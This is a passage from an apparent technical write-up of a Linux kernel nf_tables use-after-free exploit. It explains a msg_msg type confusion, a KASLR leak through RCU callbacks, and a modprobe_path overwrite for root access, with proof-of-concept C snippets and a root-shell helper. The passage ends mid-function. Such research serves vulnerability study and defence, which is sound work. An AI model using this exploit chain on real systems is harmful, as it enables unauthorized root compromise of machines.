	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span> <span class="c1">// @40</span>
	<span class="cm">/* the actual message follows immediately */</span>
	<span class="cm">/* the size can be up to 16 bytes while staying under 64 */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Looking at <code class="language-plaintext highlighter-rouge">msg_msg</code> we can see that the <code class="language-plaintext highlighter-rouge">list_head</code> is right at the beginning of the object. This is in contrast to <code class="language-plaintext highlighter-rouge">nft_expr[nft_lookup]</code>, where it is at offset 24 bytes. This is significant because the kernel believes that the address at <code class="language-plaintext highlighter-rouge">posix_msg_tree_node.msg_list.next</code> is that of a <code class="language-plaintext highlighter-rouge">msg_msg</code> object (where the <code class="language-plaintext highlighter-rouge">list_head</code> is at the beginning). Instead, the kernel will find the address of an expression’s <code class="language-plaintext highlighter-rouge">binding</code>. The kernel therefore miscalculates where the object starts: it treats the address 24 bytes into the expression as the start of the message, so the <code class="language-plaintext highlighter-rouge">security</code> pointer and the message text fall outside the 64-byte slab object. This leaves us with an OOB read primitive that can be used to leak up to 16 bytes from the next slab object, satisfying the first condition of the <em>technique</em>.
(Take a look at the table below for clarity.)</p>

<pre><code class="language-txt">nft_expr[nft_lookup]   | msg_msg
======================================================
0x0: *ops              | 
0x8: *set              |
0x10: sreg/dreg/invert | 
0x18: binding.next     | m_list.next
0x20: binding.prev     | m_list.prev
0x28: ...              | m_type
0x30: ...              | m_ts
0x38: ...              | *next
======== Going outside the 64 byte slab object =======
0x40:                  | *security
0x48:                  | msg[0]
0x50:                  | msg[1]
</code></pre>
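<p>The arithmetic behind the table can be checked with a few lines of C. This is only a user-space sketch: the <code class="language-plaintext highlighter-rouge">*_mirror</code> structs and both helper functions are hypothetical stand-ins that reproduce the offsets shown above on x86-64, they are not the kernel definitions.</p>
<pre><code class="language-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* User-space mirrors of the layouts above (x86-64 assumed). */
struct list_head { struct list_head *next, *prev; };

struct msg_msg_mirror {
	struct list_head m_list; /* @0 */
	long m_type;             /* @16 */
	size_t m_ts;             /* @24 */
	void *next;              /* @32 */
	void *security;          /* @40 */
	/* message text follows at @48 */
};

/* Hypothetical stand-in for nft_expr[nft_lookup]; only the position of
 * `binding` (0x18) and the 64-byte size matter here. */
struct lookup_expr_mirror {
	void *ops;                /* @0x00 */
	void *set;                /* @0x08 */
	uint64_t regs;            /* @0x10: sreg/dreg/invert */
	struct list_head binding; /* @0x18 */
	uint8_t rest[24];         /* @0x28: remainder of the object */
};

/* Offset, relative to the start of the expression, at which the kernel
 * will look for a msg_msg field once it mistakes `binding` for `m_list`. */
static size_t field_off_in_expr(size_t msg_field_off)
{
	return offsetof(struct lookup_expr_mirror, binding)
	       - offsetof(struct msg_msg_mirror, m_list)
	       + msg_field_off;
}

/* Non-zero when that field lies past the end of the slab object. */
static int lands_in_next_object(size_t msg_field_off)
{
	return field_off_in_expr(msg_field_off) &gt;= sizeof(struct lookup_expr_mirror);
}
</code></pre>
<p>Passing <code class="language-plaintext highlighter-rouge">offsetof(struct msg_msg_mirror, security)</code> to <code class="language-plaintext highlighter-rouge">field_off_in_expr</code> gives <code class="language-plaintext highlighter-rouge">0x40</code>, and passing <code class="language-plaintext highlighter-rouge">sizeof(struct msg_msg_mirror)</code> gives <code class="language-plaintext highlighter-rouge">0x48</code>, which are the first two rows below the separator in the table.</p>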

<p>As we already established: the second lookup expression (let it be called <code class="language-plaintext highlighter-rouge">Object 2</code>) we allocate will be treated as the first message in a message queue. However, to have a successful read via the message queue system - we need to be able to set the parameters of <code class="language-plaintext highlighter-rouge">msg_msg</code>. In order to do that we would need to UAF <code class="language-plaintext highlighter-rouge">Object 2</code> and allocate another object in its place (<code class="language-plaintext highlighter-rouge">Fake Object 2</code>).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of this data */</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual data */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The type of <code class="language-plaintext highlighter-rouge">Fake Object 2</code> will be once again <code class="language-plaintext highlighter-rouge">user_key_payload</code> as it gets allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> and we can use it to write the parameters of the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> by writing to <code class="language-plaintext highlighter-rouge">data</code>. This way we can set the <code class="language-plaintext highlighter-rouge">m_type</code> and <code class="language-plaintext highlighter-rouge">m_ts</code> of the fake message (we also have to write valid pointers into <code class="language-plaintext highlighter-rouge">m_list.next</code> and <code class="language-plaintext highlighter-rouge">m_list.prev</code>).</p>

<pre><code class="language-txt">nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
======== End of Object 2 ; Object 3 follows ==========
0x0:                   |                  | *security
0x8:                   |                  | msg[0]
0x10:                  |                  | msg[1]
</code></pre>
<p>Here the first column represents the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression that gets UAF’d. The second column is the object that gets allocated over the object that got UAF’d while the third column shows how the kernel is going to treat the object (as a <code class="language-plaintext highlighter-rouge">msg_msg</code> object that is offset by <code class="language-plaintext highlighter-rouge">24 = 0x18</code> bytes).</p>
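<p>Filling the payload is then a matter of writing five 8-byte words in the right order. The helper below is a minimal sketch of that step, not an excerpt from the PoC: the name <code class="language-plaintext highlighter-rouge">build_fake_msg</code> is made up for illustration, and setting <code class="language-plaintext highlighter-rouge">next</code> to zero is an assumption (a message without further segments).</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* data[0..4]: 40 bytes, so the 0x18-byte header plus data fills 64 bytes */
#define FAKE_MSG_WORDS 5

/* Fill the key payload so that, read at [Object 2] + 0x18, it looks like
 * the first 40 bytes of a msg_msg. All values are chosen by the caller. */
static void build_fake_msg(uint64_t data[FAKE_MSG_WORDS],
			   uint64_t list_next, uint64_t list_prev,
			   int64_t m_type, uint64_t m_ts)
{
	data[0] = list_next;        /* m_list.next */
	data[1] = list_prev;        /* m_list.prev */
	data[2] = (uint64_t)m_type; /* m_type */
	data[3] = m_ts;             /* m_ts: how many bytes the receive copies out */
	data[4] = 0;                /* next: assumed NULL, no extra segment */
}
</code></pre>
<p>The resulting 40-byte buffer is what would be handed to the keyring as the payload of the key, so that the allocation (header plus data) ends up in the same 64-byte cache as <code class="language-plaintext highlighter-rouge">Object 2</code>.</p>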

<p>Whenever a call to fetch a message is made, the function <code class="language-plaintext highlighter-rouge">do_mq_timedreceive</code> gets called. At the end of the function, as the <code class="language-plaintext highlighter-rouge">msg_msg</code> object is about to be freed, the kernel also frees <code class="language-plaintext highlighter-rouge">msg_msg-&gt;security</code> - so in order for the message fetch to succeed there must be a valid heap address at offset <code class="language-plaintext highlighter-rouge">40=0x28</code> of the <code class="language-plaintext highlighter-rouge">msg_msg</code>. We therefore need to ensure that there is indeed a heap address at that location. Note that because the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> starts 24 bytes into the object, the <code class="language-plaintext highlighter-rouge">*security</code> pointer ends up at offset <code class="language-plaintext highlighter-rouge">64=0x40</code> (<code class="language-plaintext highlighter-rouge">0x18 + 0x28</code>) - right at the beginning of the next slab object, as you can see above.</p>

<p>We are going to defeat KASLR through the object allocated right under <code class="language-plaintext highlighter-rouge">Object 2 / Fake Object 2</code>. A perfect object for this task is once again… <code class="language-plaintext highlighter-rouge">user_key_payload</code> - the main character of our write-up.
The first member of <code class="language-plaintext highlighter-rouge">user_key_payload</code> is an <code class="language-plaintext highlighter-rouge">rcu_head/callback_head</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span> <span class="c1">// @8 rcu_head-&gt;func </span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>The first member of the <code class="language-plaintext highlighter-rouge">callback_head</code> is a pointer (<code class="language-plaintext highlighter-rouge">callback_head-&gt;next</code>) that will be treated as <code class="language-plaintext highlighter-rouge">msg_msg-&gt;security</code> and the second member is a function pointer that will overlap with <code class="language-plaintext highlighter-rouge">msg[0]</code>. Therefore if we make a call to read the message we will be able to read that function pointer and leak KASLR.</p>

<p>However, there is an issue: both <code class="language-plaintext highlighter-rouge">callback_head-&gt;next</code> and <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> will be <em>null</em> by default. In order to populate them we must make a call to change the payload (<code class="language-plaintext highlighter-rouge">Object 3</code>). This is due to the way RCU callbacks work - when a call is made to change an RCU-protected object <code class="language-plaintext highlighter-rouge">call_rcu</code> is invoked.</p>
<blockquote>
  <p>The call_rcu() API is a callback form of synchronize_rcu().  Instead of blocking, it registers a function and argument which are invoked after all ongoing RCU read-side critical sections have completed. This callback variant is particularly useful in situations where it is illegal to block or where update-side performance is critically important.</p>
</blockquote>

<p>The function at <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> will be executed by the kernel when it is safe to do so. In the case of updating a <code class="language-plaintext highlighter-rouge">user_key_payload</code> the callback function will be <code class="language-plaintext highlighter-rouge">user_free_payload_rcu</code> which will free and zero out <code class="language-plaintext highlighter-rouge">Object 3</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">user_free_payload_rcu</span><span class="p">(</span><span class="k">struct</span> <span class="n">rcu_head</span> <span class="o">*</span><span class="n">head</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="o">*</span><span class="n">payload</span><span class="p">;</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="n">container_of</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="k">struct</span> <span class="n">user_key_payload</span><span class="p">,</span> <span class="n">rcu</span><span class="p">);</span>
	<span class="n">kfree_sensitive</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So leaking <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> is essentially a race against the kernel - trying to read it and leak it before the kernel zeroes it out.</p>

<p>I go over the technique in more detail in my article <a href="https://ysanatomic.github.io/abusing_rcu_callbacks_to_defeat_kaslr/">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</a>.</p>

<h4 id="summarizing-the-kaslr-leak-process-">Summarizing the KASLR leak process: <a name="summarizingkaslr"></a></h4>
<ol>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression (<code class="language-plaintext highlighter-rouge">Object 1</code>) such that it causes a UAF.</li>
  <li>Initiate a message queue in order to allocate a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) at the location of <code class="language-plaintext highlighter-rouge">Object 1</code>.</li>
  <li>Spray <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects and then randomly free a few to create a bunch of gaps in the cache so <code class="language-plaintext highlighter-rouge">Object 2</code> gets allocated in between them.</li>
  <li>Add a new <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) such that it causes a UAF. The address of this expression’s <code class="language-plaintext highlighter-rouge">binding</code> (which is <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code>) will be written into the <code class="language-plaintext highlighter-rouge">msg_list.next</code> of the <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code>. Now if a message is fetched from the message queue, the kernel will read <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code> as the message (<code class="language-plaintext highlighter-rouge">msg_msg</code>). We also hope that this object was allocated such that the object immediately below it is a <code class="language-plaintext highlighter-rouge">user_key_payload</code> (which is why we spray a lot of them in step 3).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> (<code class="language-plaintext highlighter-rouge">Fake Object 2</code>) at the location of <code class="language-plaintext highlighter-rouge">Object 2</code>. Write into the payload the parameter values we want our fake <code class="language-plaintext highlighter-rouge">msg_msg</code> at <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code> to have. We write values for <code class="language-plaintext highlighter-rouge">m_list-&gt;next</code>, <code class="language-plaintext highlighter-rouge">m_list-&gt;prev</code>, <code class="language-plaintext highlighter-rouge">m_type</code> and <code class="language-plaintext highlighter-rouge">m_ts</code>.</li>
  <li>Mass update all the <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects to populate the <code class="language-plaintext highlighter-rouge">rcu_head</code> members.</li>
  <li>Make a call to fetch the first message from a message queue. This should leak a kernel address, defeating KASLR (if we won the race against the kernel to leak <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func</code> before it got zeroed out).</li>
</ol>
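<p>The last step hands us a raw function pointer, and turning it into a kernel base is a single subtraction. The snippet below is a minimal sketch of that, assuming the offset of <code class="language-plaintext highlighter-rouge">user_free_payload_rcu</code> from the kernel base is known for the target build. The constant is hypothetical and merely chosen to be consistent with the sample output in the Proof-of-Concept section; both function names are made up for illustration.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* Hypothetical, build-specific offset of user_free_payload_rcu from the
 * kernel base. Look it up for the kernel you are actually targeting. */
#define USER_FREE_PAYLOAD_RCU_OFF 0x54bef0ULL

/* Kernel base derived from the leaked rcu_head-&gt;func value. */
static uint64_t kernel_base_from_leak(uint64_t leaked_func)
{
	return leaked_func - USER_FREE_PAYLOAD_RCU_OFF;
}

/* Heuristic sanity check: a lost race typically reads zeroes, while
 * kernel text addresses on x86-64 have the upper 32 bits all set. */
static int leak_looks_valid(uint64_t leaked_func)
{
	return (leaked_func &gt;&gt; 32) == 0xffffffffULL;
}
</code></pre>
<p>If <code class="language-plaintext highlighter-rouge">leak_looks_valid</code> fails, the race was most likely lost and the whole leak stage has to be retried.</p>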

<h3 id="escalating-via-a-modprobe_path-overwrite-">Escalating via a modprobe_path overwrite <a name="escalating"></a></h3>
<p>An easy way to achieve Local Privilege Escalation is by overwriting the <code class="language-plaintext highlighter-rouge">modprobe_path</code> of the kernel.
<code class="language-plaintext highlighter-rouge">modprobe</code> is used to load kernel modules from userspace. A common usage of it is to load the necessary module needed to execute a binary with an uncommon binary header. 
The location of <code class="language-plaintext highlighter-rouge">modprobe</code> is stored in the <code class="language-plaintext highlighter-rouge">modprobe_path</code> symbol. It is possible for us to overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> as it is stored in the <code class="language-plaintext highlighter-rouge">.data</code> segment (which is read/write and variables stored in there can be altered at run time).</p>

<h4 id="method-of-exploitation--1">Method of Exploitation <a name="escalatingmethod"></a></h4>
<p>Our goal is to overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> so that it points to an executable that we control - let’s call that <code class="language-plaintext highlighter-rouge">fake_modprobe</code>.</p>

<p>As we already established, <code class="language-plaintext highlighter-rouge">modprobe</code> is executed in order to load a kernel module needed to handle the execution of a binary of an uncommon type. We can set up a <code class="language-plaintext highlighter-rouge">trigger</code> binary with an unknown binary header which, when executed, will force the kernel to execute <code class="language-plaintext highlighter-rouge">modprobe</code> in order to attempt to load an appropriate kernel module to handle <code class="language-plaintext highlighter-rouge">trigger</code>. But instead of <code class="language-plaintext highlighter-rouge">modprobe</code> being run, <code class="language-plaintext highlighter-rouge">fake_modprobe</code> will be executed with root privileges.</p>

<p>The <code class="language-plaintext highlighter-rouge">fake_modprobe</code> executable can be a simple script that changes the ownership of a <code class="language-plaintext highlighter-rouge">get_shell</code> executable to <code class="language-plaintext highlighter-rouge">root</code> and sets its SUID and SGID bits. In this case, <code class="language-plaintext highlighter-rouge">get_shell</code> just does:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setuid(0);
setgid(0);
system("/bin/sh");
</code></pre></div></div>
<p>The process summarized:</p>
<ul>
  <li>Overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> to <code class="language-plaintext highlighter-rouge">/path/to/fake_modprobe</code></li>
  <li>Execute a <code class="language-plaintext highlighter-rouge">trigger</code> binary with an unknown binary header.</li>
  <li>The kernel executes <code class="language-plaintext highlighter-rouge">fake_modprobe</code> in an attempt to load the needed modules to execute <code class="language-plaintext highlighter-rouge">trigger</code> which instead changes the ownership and permissions of <code class="language-plaintext highlighter-rouge">get_shell</code>.</li>
  <li>Execute <code class="language-plaintext highlighter-rouge">get_shell</code> to escalate privileges.</li>
</ul>
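<p>The <code class="language-plaintext highlighter-rouge">trigger</code> file from the second step needs nothing more than a header that no binary format handler recognises. Here is a minimal sketch of creating one, assuming four <code class="language-plaintext highlighter-rouge">0xff</code> bytes as the header (my choice for illustration, other unrecognised non-printable headers should work as well) and a path supplied by the caller. The function name <code class="language-plaintext highlighter-rouge">write_trigger</code> is hypothetical.</p>
<pre><code class="language-c">#include &lt;fcntl.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;unistd.h&gt;

/* Writes an executable file whose first four bytes are 0xff, a header
 * assumed here to match no registered binary format.
 * Returns 0 on success and -1 on failure. */
static int write_trigger(const char *path)
{
	static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
	int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);

	if (fd &lt; 0)
		return -1;
	ssize_t n = write(fd, magic, sizeof(magic));
	close(fd);
	if (n != (ssize_t)sizeof(magic))
		return -1;
	/* the mode passed to open() is filtered by the umask, so set it again */
	return chmod(path, 0755) == 0 ? 0 : -1;
}
</code></pre>
<p>Executing the resulting file fails with an exec format error, and it is on this failure path that the kernel consults <code class="language-plaintext highlighter-rouge">modprobe_path</code>.</p>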

<h4 id="overwriting-modprobe_path-">Overwriting modprobe_path <a name="overwritingmodprobe"></a></h4>
<p>When a call to fetch a message is made the function <code class="language-plaintext highlighter-rouge">do_mq_timedreceive</code> gets executed which itself makes a call to <code class="language-plaintext highlighter-rouge">msg_get</code> to get the highest priority message from a queue.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="nf">msg_get</span><span class="p">(</span><span class="k">struct</span> <span class="n">mqueue_inode_info</span> <span class="o">*</span><span class="n">info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">parent</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="o">*</span><span class="n">leaf</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>

<span class="nl">try_again:</span>
	<span class="cm">/*
	 * During insert, low priorities go to the left and high to the
	 * right.  On receive, we want the highest priorities first, so
	 * walk all the way to the right.
	 */</span>
	<span class="n">parent</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">msg_tree_rightmost</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">parent</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"Inconsistency in POSIX message queue, "</span>
				     <span class="s">"no tree element, but supposedly messages "</span>
				     <span class="s">"should exist!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
			<span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="n">leaf</span> <span class="o">=</span> <span class="n">rb_entry</span><span class="p">(</span><span class="n">parent</span><span class="p">,</span> <span class="k">struct</span> <span class="n">posix_msg_tree_node</span><span class="p">,</span> <span class="n">rb_node</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">)))</span> <span class="p">{</span>
		<span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"Inconsistency in POSIX message queue, "</span>
			     <span class="s">"empty leaf node but we haven't implemented "</span>
			     <span class="s">"lazy leaf delete!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">msg_tree_erase</span><span class="p">(</span><span class="n">leaf</span><span class="p">,</span> <span class="n">info</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">try_again</span><span class="p">;</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">msg</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">,</span>
				       <span class="k">struct</span> <span class="n">msg_msg</span><span class="p">,</span> <span class="n">m_list</span><span class="p">);</span>
		<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">m_list</span><span class="p">);</span> <span class="c1">// [1] &lt;---------------------</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">msg_tree_erase</span><span class="p">(</span><span class="n">leaf</span><span class="p">,</span> <span class="n">info</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span><span class="o">--</span><span class="p">;</span>
	<span class="n">info</span><span class="o">-&gt;</span><span class="n">qsize</span> <span class="o">-=</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">m_ts</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">msg</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that <code class="language-plaintext highlighter-rouge">list_del</code> is used to remove the message (<code class="language-plaintext highlighter-rouge">msg_msg</code>) from the linked list of messages in the queue.</p>

<p><code class="language-plaintext highlighter-rouge">list_del</code> deletes a list entry by making the prev/next entries point to each other.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__list_del</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span> <span class="n">prev</span><span class="p">,</span> <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span> <span class="n">next</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">=</span> <span class="n">prev</span><span class="p">;</span> <span class="c1">// [1]</span>
	<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">,</span> <span class="n">next</span><span class="p">);</span> <span class="c1">// [2]</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The instruction at <code class="language-plaintext highlighter-rouge">[1]</code> will write <code class="language-plaintext highlighter-rouge">prev</code> into <code class="language-plaintext highlighter-rouge">next+0x8</code> while the instruction at <code class="language-plaintext highlighter-rouge">[2]</code> will write <code class="language-plaintext highlighter-rouge">next</code> into <code class="language-plaintext highlighter-rouge">prev</code>.</p>
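<p>To make the two stores tangible, here is a user-space sketch that performs them on an ordinary <code class="language-plaintext highlighter-rouge">list_head</code>. It mirrors <code class="language-plaintext highlighter-rouge">__list_del</code> only; <code class="language-plaintext highlighter-rouge">list_del_sketch</code> is a made-up name and the kernel’s optional list debugging checks are left out.</p>
<pre><code class="language-c">#include &lt;stddef.h&gt;

struct list_head { struct list_head *next, *prev; };

/* Same two stores as __list_del(), written out for a single entry.
 * The real list_del() additionally poisons entry-&gt;next/prev afterwards. */
static void list_del_sketch(struct list_head *entry)
{
	struct list_head *prev = entry-&gt;prev;
	struct list_head *next = entry-&gt;next;

	next-&gt;prev = prev; /* [1]: 8-byte store at (char *)next + 8 */
	prev-&gt;next = next; /* [2]: 8-byte store at (char *)prev + 0 */
}
</code></pre>
<p>Whoever controls <code class="language-plaintext highlighter-rouge">entry-&gt;next</code> and <code class="language-plaintext highlighter-rouge">entry-&gt;prev</code> therefore controls both the destination and the value of store <code class="language-plaintext highlighter-rouge">[1]</code>, with the side condition that <code class="language-plaintext highlighter-rouge">prev</code> itself must be writable for store <code class="language-plaintext highlighter-rouge">[2]</code>.</p>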

<p>We introduced in the <strong>KASLR bypass</strong> section of this write-up a way to fool the kernel that an object is a <code class="language-plaintext highlighter-rouge">msg_msg</code> - with the ability to set the members of the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> to the values we want.</p>
<pre><code class="language-txt">nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
=====================================================
0x0:                   |                  | *security
0x8:                   |                  | msg[0]
0x10:                  |                  | msg[1]
</code></pre>
<p>We can use a <code class="language-plaintext highlighter-rouge">user_key_payload</code> object to set up the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> exactly how we want it - including setting <code class="language-plaintext highlighter-rouge">m_list.next</code> and <code class="language-plaintext highlighter-rouge">m_list.prev</code> to any value we want. We can therefore take advantage of the <code class="language-plaintext highlighter-rouge">list_del</code> function - letting it write to <code class="language-plaintext highlighter-rouge">modprobe_path</code> for us. To do that we set <code class="language-plaintext highlighter-rouge">m_list.prev</code> to the value we want written into <code class="language-plaintext highlighter-rouge">modprobe_path</code> and set <code class="language-plaintext highlighter-rouge">m_list.next</code> to <code class="language-plaintext highlighter-rouge">modprobe_path - 0x7</code>. Since <code class="language-plaintext highlighter-rouge">list_del</code> writes <code class="language-plaintext highlighter-rouge">prev</code> into <code class="language-plaintext highlighter-rouge">next+0x8</code>, the store lands at <code class="language-plaintext highlighter-rouge">modprobe_path + 0x1</code>, which leaves the <code class="language-plaintext highlighter-rouge">/</code> at the beginning of the existing <code class="language-plaintext highlighter-rouge">modprobe_path</code> intact.</p>

<p>An interesting caveat though is that the value we write to <code class="language-plaintext highlighter-rouge">m_list.prev</code> (which is going to serve as the path written in <code class="language-plaintext highlighter-rouge">modprobe_path</code>) must also be a valid address that the kernel is able to write to, because the second store in <code class="language-plaintext highlighter-rouge">__list_del</code> writes <code class="language-plaintext highlighter-rouge">next</code> into it. This however is not a problem: we leaked the heap base earlier, so we can construct a value that is both a valid heap address and a usable path.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// excerpt from my Proof-of-Concept</span>
<span class="kt">uint64_t</span> <span class="n">modprobe_path</span> <span class="o">=</span> <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2f706d74</span><span class="p">;</span> <span class="c1">// 0x2f706d74 = tmp/ (but little endian)</span>
</code></pre></div></div>
<p>This would result in <code class="language-plaintext highlighter-rouge">modprobe_path</code> being changed to <code class="language-plaintext highlighter-rouge">/tmp/&lt;2 bytes of entropy&gt;\xff\xff&lt;rest of original modprobe_path&gt;</code> (the 2 bytes of entropy here belong to the heap base we leaked).</p>
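<p>The resulting path can be predicted in user space before anything is triggered, which is handy for knowing where to place the fake modprobe. The following is a sketch under the assumption that the original path is <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code>; <code class="language-plaintext highlighter-rouge">overwrite_path</code> is a hypothetical helper that replays store <code class="language-plaintext highlighter-rouge">[1]</code> of <code class="language-plaintext highlighter-rouge">__list_del</code> on a local buffer.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* Replays store [1] of __list_del on a local copy of modprobe_path:
 * the 8 bytes of `prev` are written in little-endian order at path + 1,
 * i.e. at (modprobe_path - 0x7) + 0x8. The buffer must hold 9+ bytes. */
static void overwrite_path(char *path, uint64_t prev)
{
	for (int i = 0; i &lt; 8; i++)
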